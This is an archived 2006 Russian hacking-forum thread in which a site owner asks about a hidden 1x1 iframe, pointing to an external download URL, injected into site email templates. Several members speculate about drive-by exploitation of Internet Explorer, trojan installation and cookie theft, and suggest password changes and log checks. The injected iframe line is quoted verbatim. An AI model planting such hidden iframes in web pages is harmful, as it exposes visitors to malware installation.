Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Пытались хакнуть (https://forum.antichat.xyz/showthread.php?t=22230)

CraZy I izzi 03.08.2006 20:13
Пытались хакнуть
 
Здрасти) у меня на сайте была обнаружена вот такая строчка

Код:
<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ...

Какие последствия могут быть? И чего мог добиться хакер?

Спасибо)

Rebz 03.08.2006 20:15
знакомая строчка.
такая приписывалась с слоите RST помоему..для IPB 2.1.6..

CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..

CraZy I izzi 03.08.2006 20:21
мдя)) не повезло мне))

что посоветуете делать? чтоб такого больше не произашло?

max_pain89 03.08.2006 20:22
я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно

Rebz 03.08.2006 20:26
нда, макс дело говорит...

что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)

CraZy I izzi 03.08.2006 20:29
эти меры уже приняты ..

может ещё что посаветуете? или где можно почитать инфу об этом?

Rebz 03.08.2006 20:35
https://forum.antichat.ru/showpost.php?p=175930&postcount=3
гм.. разные adv, но смысл тот же..
Молодец, правильно все делаешь.

genom-- 03.08.2006 20:40
ищи дырку както уж он вставил это---- а насчет последствий мож просто клики на вас зарабатывал =)

podkashey 04.08.2006 03:26
Цитата:
<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть...

Цитата:
а на будущее счобы не спрашивать что он мог сделать открой по сслыке скрипт-- без выполнения или слей его качалкой-- и позырь что он делает
Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!! ;)

Rebz 04.08.2006 10:00
dinar_007, прекрати флеймить..

ребят, вы хоть видели, что там даже сайта нет?

"Fedora Core Test Page"

Побоялись зайти?)

podkashey 04.08.2006 11:30
Цитата:
podkashey качалки выкачивают главную страницу и ищут там линки на страницы на этом же сервере и так \"парсят\" каждую.сомневаюсь что там будет линк на пароли и тому подобное
гыгы... это я к тому, что геном предложил скачать пхп файл... ;)))
А как качалки работают я знаю... сам телепортом давно еще выкачивал всякое разное...

limpompo 04.08.2006 12:00
Данный iframe на Сплоит где идёт подгрузка софта!

CraZy I izzi 04.08.2006 14:54
Мда .. но фишка в том что этот код был вписан в Админке в \"Формы для отправки писем с сайта\" ... движок ДЛЕ ... на сколько я знаю эти формы хранятся в базе ... и по-этому могу предположить что было проникновение в админку .... может я и не прав ... но всё же

Rebz 04.08.2006 15:19
Не юзал движок ДЛЕ. но если логически подумать..как сообщение могло оказаться в админке.. если никто туда не проникал? ы?
Скорее всего сделали рассылку с данной ссылкой..чтобы протроянить юзеров, зареганных на сайте. как вариант.. имхо. Судя из твоих слов.

CraZy I izzi 04.08.2006 15:41
а я не исключаю возможности проникновения в админку ..

был у меня случай .. форум Ipb взломали у меня .. мож тогда и было проникновение через форум в ДЛЕ ... но на сколько знаю ДЛЕ сам не сильно дырявый .. хотя .. дыры есть везде ИМХО

Rebz 04.08.2006 15:56
спроси логи у хостера за тот день когда взлом был.

pop_korn 05.08.2006 17:00
ослинный сплоит :)

Redirection Status
The URL was redirected to . Please click the link to go there.

You can enable the automatic redirection in the settings.

Generated by Opera ©


Время: 13:54